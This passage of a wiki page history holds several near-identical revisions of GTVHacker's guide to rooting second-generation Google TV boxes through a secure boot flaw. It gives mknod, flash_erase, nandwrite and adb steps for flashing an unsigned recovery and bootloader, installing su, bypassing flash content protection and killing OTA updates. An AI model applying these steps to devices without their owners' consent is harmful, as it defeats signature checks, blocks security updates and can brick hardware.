: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it's filesize

== Custom Recovery Steps (Sony) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/block for the recovery block.
#: <code>mknod gtvhacker-recovery b 179 10</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>
#: cp /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-recovery</code>
#: Now the recovery is installed, but to prevent it from being overwritten and to add su you MUST do the following.
#Disconnect from adb and format a FAT32 drive.
#Copy GTVHacker-secureboot-update.zip to root of FAT32 drive.
#Rename GTVHacker-secureboot-update.zip to update.zip
#Unmount and eject FAT32 drive.
#Plug FAT32 Drive and USB Keyboard into Google TV
#On host PC enter in the following to boot GoogleTV into recovery mode.
#: <code>adb reboot recovery</code>
#After entering GTVHacker recovery press 1 to install from update.zip.
#If install is successful, you will be prompted to press Q to exit.

== Developers Only (SONY) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel b 179 7</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>
#: cp /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-kernel</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.
*To then boot from USB (try other ports if its not detected):
<code>usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 </code>
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it's filesize

== Troubleshooting ==

*'''Help! By recovery doesn't persist after a reboot?!'''
: You must use the custom recovery to install the Secure Boot update.zip file for recovery to persist, otherwise it will be overwritten on the first normal boot. Installing this .zip puts a su binary on the box, installs the flash content bypass, kills OTA updates, and persists the recovery.

*'''Recovery is saying that the update.zip file cannot be found.'''
: You must have the USB drive plugged in prior to booting the box and the USB drive must be FAT32 formatted. Use "fdisk -l" to verify the device has a correctly structured partition table.

*You can get help from us or other users at:

[http://forum.gtvhacker.com/ GTVHacker Forums]

[http://www.gtvhacker.com GTVHacker Wiki]

*or you can chat with us on IRC at:

irc.freenode.net #gtvhacker

[http://webchat.freenode.net/?randomnick=1&channels=gtvhacker&uio=d4 Freenode Webchat]

(Someone may not be around right away to help, make sure to be willing to wait for a response)

== Download ==
'''GTVHacker SecureBoot update.zip'''
*[http://download.gtvhacker.com/file/generic/GTVHacker-secureboot-update.zip SecureBoot Update.zip]

'''Custom Recovery:'''
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]

Installing Custom Recovery (Gen 2 Only)

2013-08-15T00:52:19Z

CJ: /* Developers Only (SONY) (UART console required) */

== About ==
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.)

== Devices ==
*ASUS Cube
*Hisense Pulse
*Sony NSZ-GS7/GS8

== Warnings ==
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.
*This may brick your GTV. It shouldn't, but it still might!

== Tools Needed ==
*Linux Live CD or Linux Installed
*A vulnerable Google TV device.
*1 USB Drive (to be formatted)
*1 USB Keyboard

== Pre-Setup ==
#Boot Linux (Live CD or Install)
#Download Custom Recovery Package for Device
#Download GTVHacker SecureBoot update.zip
#Unzip Custom Recovery Package

== Custom Recovery Steps (Cube and Pulse) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the recovery mtd.
#: <code>mknod gtvhacker-recovery c 90 32</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin</code>
#: Now the recovery is installed, but to prevent it from being overwritten and to add su you MUST do the following.
#Disconnect from adb and format a FAT32 drive.
#Copy GTVHacker-secureboot-update.zip to root of FAT32 drive.
#Rename GTVHacker-secureboot-update.zip to update.zip
#Unmount and eject FAT32 drive.
#Plug FAT32 Drive and USB Keyboard into Google TV
#On host PC enter in the following to boot GoogleTV into recovery mode.
#: <code>adb reboot recovery</code>
#After entering GTVHacker recovery press 1 to install from update.zip.
#If install is successful, you will be prompted to press Q to exit.

== Developers Only (CUBE, PULSE) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel c 90 16</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.
*To then boot from USB (try other ports if its not detected):
<code>usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 </code>
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it's filesize

== Custom Recovery Steps (Sony) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/block for the recovery block.
#: <code>mknod gtvhacker-recovery b 179 10</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>
#: cp /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-recovery</code>
#: Now the recovery is installed, but to prevent it from being overwritten and to add su you MUST do the following.
#Disconnect from adb and format a FAT32 drive.
#Copy GTVHacker-secureboot-update.zip to root of FAT32 drive.
#Rename GTVHacker-secureboot-update.zip to update.zip
#Unmount and eject FAT32 drive.
#Plug FAT32 Drive and USB Keyboard into Google TV
#On host PC enter in the following to boot GoogleTV into recovery mode.
#: <code>adb reboot recovery</code>
#After entering GTVHacker recovery press 1 to install from update.zip.
#If install is successful, you will be prompted to press Q to exit.

== Developers Only (SONY) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel b 179 7</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>
#: cp /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-kernel</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.
*To then boot from USB (try other ports if its not detected):
<code>usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 </code>
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it's filesize

== Troubleshooting ==

*'''Help! By recovery doesn't persist after a reboot?!'''
: You must use the custom recovery to install the Secure Boot update.zip file for recovery to persist, otherwise it will be overwritten on the first normal boot. Installing this .zip puts a su binary on the box, installs the flash content bypass, kills OTA updates, and persists the recovery.

*'''Recovery is saying that the update.zip file cannot be found.'''
: You must have the USB drive plugged in prior to booting the box and the USB drive must be FAT32 formatted. Use "fdisk -l" to verify the device has a correctly structured partition table.

*You can get help from us or other users at:

[http://forum.gtvhacker.com/ GTVHacker Forums]

[http://www.gtvhacker.com GTVHacker Wiki]

*or you can chat with us on IRC at:

irc.freenode.net #gtvhacker

[http://webchat.freenode.net/?randomnick=1&channels=gtvhacker&uio=d4 Freenode Webchat]

(Someone may not be around right away to help, make sure to be willing to wait for a response)

== Download ==
'''GTVHacker SecureBoot update.zip'''
*[http://download.gtvhacker.com/file/generic/GTVHacker-secureboot-update.zip SecureBoot Update.zip]

'''Custom Recovery:'''
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]

Installing Custom Recovery (Gen 2 Only)

2013-08-08T22:41:04Z

CJ: /* Developers Only (SONY) (UART console required) */

== About ==
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.)

== Devices ==
*ASUS Cube
*Hisense Pulse
*Sony NSZ-GS7/GS8

== Warnings ==
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.
*This may brick your GTV. It shouldn't, but it still might!

== Tools Needed ==
*Linux Live CD or Linux Installed
*A vulnerable Google TV device.
*1 USB Drive (to be formatted)

== Pre-Setup ==
#Boot Linux (Live CD or Install)
#Download Custom Recovery Package for Device
#Unzip Custom Recovery Package

== Custom Recovery Steps (Cube and Pulse) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the recovery mtd.
#: <code>mknod gtvhacker-recovery c 90 32</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom recovery.

== Developers Only (CUBE, PULSE) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel c 90 16</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.
*To then boot from USB (try other ports if its not detected):
<code>usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 </code>
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it's filesize

== Custom Recovery Steps (Sony) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/block for the recovery block.
#: <code>mknod gtvhacker-recovery b 179 10</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>
#: cp /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-recovery</code>
#Issue an adb reboot, and you have a custom recovery.

== Developers Only (SONY) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel b 179 7</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>
#: cp /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-mtd8</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.
*To then boot from USB (try other ports if its not detected):
<code>usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 </code>
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it's filesize

== Troubleshooting ==

*You can get help from us or other users at:

[http://forum.gtvhacker.com/ GTVHacker Forums]

[http://www.gtvhacker.com GTVHacker Wiki]

*or you can chat with us on IRC at:

irc.freenode.net #gtvhacker

[http://webchat.freenode.net/?randomnick=1&channels=gtvhacker&uio=d4 Freenode Webchat]

(Someone may not be around right away to help, make sure to be willing to wait for a response)

== Download ==

'''Custom Recovery:'''
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]

Installing Custom Recovery (Gen 2 Only)

2013-08-08T22:40:27Z

CJ: /* Custom Recovery Steps (Sony) */

== About ==
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.)

== Devices ==
*ASUS Cube
*Hisense Pulse
*Sony NSZ-GS7/GS8

== Warnings ==
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.
*This may brick your GTV. It shouldn't, but it still might!

== Tools Needed ==
*Linux Live CD or Linux Installed
*A vulnerable Google TV device.
*1 USB Drive (to be formatted)

== Pre-Setup ==
#Boot Linux (Live CD or Install)
#Download Custom Recovery Package for Device
#Unzip Custom Recovery Package

== Custom Recovery Steps (Cube and Pulse) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the recovery mtd.
#: <code>mknod gtvhacker-recovery c 90 32</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom recovery.

== Developers Only (CUBE, PULSE) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel c 90 16</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.
*To then boot from USB (try other ports if its not detected):
<code>usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 </code>
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it's filesize

== Custom Recovery Steps (Sony) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/block for the recovery block.
#: <code>mknod gtvhacker-recovery b 179 10</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>
#: cp /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-recovery</code>
#Issue an adb reboot, and you have a custom recovery.

== Developers Only (SONY) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel b 179 7</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>cd /data/local/tmp
#: cp /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-mtd8</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.
*To then boot from USB (try other ports if its not detected):
<code>usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 </code>
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it's filesize

== Troubleshooting ==

*You can get help from us or other users at:

[http://forum.gtvhacker.com/ GTVHacker Forums]

[http://www.gtvhacker.com GTVHacker Wiki]

*or you can chat with us on IRC at:

irc.freenode.net #gtvhacker

[http://webchat.freenode.net/?randomnick=1&channels=gtvhacker&uio=d4 Freenode Webchat]

(Someone may not be around right away to help, make sure to be willing to wait for a response)

== Download ==

'''Custom Recovery:'''
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]

Installing Custom Recovery (Gen 2 Only)

2013-08-07T23:58:03Z

CJ: /* Developers Only (SONY) (UART console required) */

== About ==
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.)

== Devices ==
*ASUS Cube
*Hisense Pulse
*Sony NSZ-GS7/GS8

== Warnings ==
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.
*This may brick your GTV. It shouldn't, but it still might!

== Tools Needed ==
*Linux Live CD or Linux Installed
*A vulnerable Google TV device.
*1 USB Drive (to be formatted)

== Pre-Setup ==
#Boot Linux (Live CD or Install)
#Download Custom Recovery Package for Device
#Unzip Custom Recovery Package

== Custom Recovery Steps (Cube and Pulse) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the recovery mtd.
#: <code>mknod gtvhacker-recovery c 90 32</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom recovery.

== Developers Only (CUBE, PULSE) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel c 90 16</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.
*To then boot from USB (try other ports if its not detected):
<code>usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 </code>
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it's filesize

== Custom Recovery Steps (Sony) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/block for the recovery block.
#: <code>mknod gtvhacker-recovery b 179 10</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>
#: cd /data/local/tmp
#: cp /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-recovery</code>
#Issue an adb reboot, and you have a custom recovery.

== Developers Only (SONY) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel b 179 7</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>cd /data/local/tmp
#: cp /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-mtd8</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.
*To then boot from USB (try other ports if its not detected):
<code>usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 </code>
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it's filesize

== Troubleshooting ==

*You can get help from us or other users at:

